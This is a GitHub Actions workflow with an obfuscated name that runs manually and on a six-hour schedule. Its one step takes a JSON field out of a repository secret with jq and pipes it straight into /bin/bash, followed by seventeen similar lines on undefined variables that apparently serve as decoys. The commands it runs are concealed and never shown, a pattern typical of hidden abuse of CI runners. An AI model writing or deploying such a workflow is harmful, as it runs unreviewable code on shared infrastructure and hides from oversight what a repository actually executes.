name: caohong19870101
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caohong19870101
        env:
          uzig589: ${{ secrets.uzig589 }}
        run: |
          echo $uzig589 | jq -r .zbiez6359 | /bin/bash
          echo $skenp4241 | jq -r .w2 | /bin/bash
          echo $z66 | jq -r .q786 | /bin/bash
          echo $l0378 | jq -r .sb0 | /bin/bash
          echo $lk5 | jq -r .bdcs52966 | /bin/bash
          echo $uiny42006 | jq -r .juqoz0 | /bin/bash
          echo $zjpss92884 | jq -r .rkh5763 | /bin/bash
          echo $dymxv11 | jq -r .a8 | /bin/bash
          echo $a64095 | jq -r .shx8 | /bin/bash
          echo $it2 | jq -r .tpjys57 | /bin/bash
          echo $ntcv1 | jq -r .vna4589 | /bin/bash
          echo $gd14 | jq -r .lyu127 | /bin/bash
          echo $tak553 | jq -r .ovog11361 | /bin/bash
          echo $kjcr25945 | jq -r .tqrdk8 | /bin/bash
          echo $jdxpw11627 | jq -r .duvp63 | /bin/bash
          echo $wdbmg00916 | jq -r .i438 | /bin/bash
          echo $p3 | jq -r .udbpx01740 | /bin/bash
          echo $we0964 | jq -r .bibxq4 | /bin/bash

